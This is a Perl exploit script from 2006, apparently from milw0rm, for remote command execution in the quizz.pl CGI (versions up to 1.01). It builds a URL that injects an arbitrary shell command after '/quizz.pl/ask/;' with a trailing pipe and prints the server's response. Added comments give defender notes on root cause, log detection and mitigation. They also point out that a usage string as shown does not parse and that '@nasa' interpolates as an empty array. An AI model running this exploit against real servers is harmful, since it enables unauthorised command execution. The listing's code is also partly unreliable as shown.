quizz <= 1.01 (quizz.pl) Remote Command Execution Exploit :

Date : 2006-04-13 Author : FOX_MULDER
#!/usr/bin/perl
#
#  quizz.p exploit by FOX_MULDER ([email protected])
#
#  Vulnerability found by WBYTE.
#
#  Born to be root !!!
#  
#  !!!!!!!!!!!!!!!THANKS to WBYTE !!!!!!!!!!!!!!!!!
#
#  FACT:Wbyte doesn't sleeps , he waits !.
#  0day
####################################################################################

use IO::Socket;
use LWP::Simple; 

# Usage: write a banner and the expected command line to STDERR, then exit.
# The argument-count check below calls this when fewer than three arguments
# are supplied.
# NOTE(review): as shown in this listing the second string literal contains
# unescaped double quotes around cmd, so the literal ends early and the file
# does not parse. Presumably backslash escapes were lost when the page was
# extracted -- confirm against the original advisory text.
sub Usage {
print STDERR "
FOX_MULDER DID IT AGAIN !!!
";
print STDERR "Usage:
quiz.pl <www.example.com> </path/> "cmd"
";
# Bare exit returns status 0, so a caller cannot tell this path from success.
exit;
}

# Argument handling and banner.
# Three positional arguments are required (host, path, command string);
# with fewer, Usage() prints the usage text and exits.
Usage() if @ARGV < 3;

# The arguments are taken as given: nothing below validates them before
# they are placed into the request URL.
($host, $path, $command) = @ARGV[0, 1, 2];

# Banner and status lines. Both "[+]" lines are printed unconditionally and
# before any network activity, so they do not indicate that a connection or
# request actually succeeded.
print "\n\n !!! PRIVATE PRIVATE PRIVATE !!! \n\n",
      "quizz.pl 0day Remote Command Execution Exploit by FOX_MULDER\n",
      "\n[+] Conecting to $host\n",
      "\n[+] Injecting command . . .\n\n";

# Single HTTP GET against the quizz.pl CGI. The third argument is placed in
# the path after "/quizz.pl/ask/", preceded by ';' and followed by '|'.
#
# Defender notes:
#  - Root cause (presumed, not shown on this page): the CGI hands request
#    path data to a shell or to a two-argument open(), where a trailing '|'
#    means "run as a command". Confirm against the quizz.pl source.
#  - Detection: review web-server access logs for requests to quizz.pl whose
#    path info after /ask/ contains ';' or ends in '|' (raw or
#    percent-encoded).
#  - Mitigation in the CGI: validate path info against an allow-list of
#    expected names, use three-argument open() with an explicit mode, and
#    never pass request data to a shell. This page names no fixed release
#    of quizz.
my $url    = "http://$host$path/quizz.pl/ask/;$command|";
my $result = get($url);

# LWP::Simple::get returns undef when the request fails; otherwise the
# response body is echoed verbatim.
# NOTE(review): "@nasa" sits inside a double-quoted string, so Perl
# interpolates it as an (empty) array and the prefix prints as "fox# ".
print defined $result
    ? "fox@nasa# $result"
    : "Error with request.\n";

# milw0rm.com [2006-04-13]
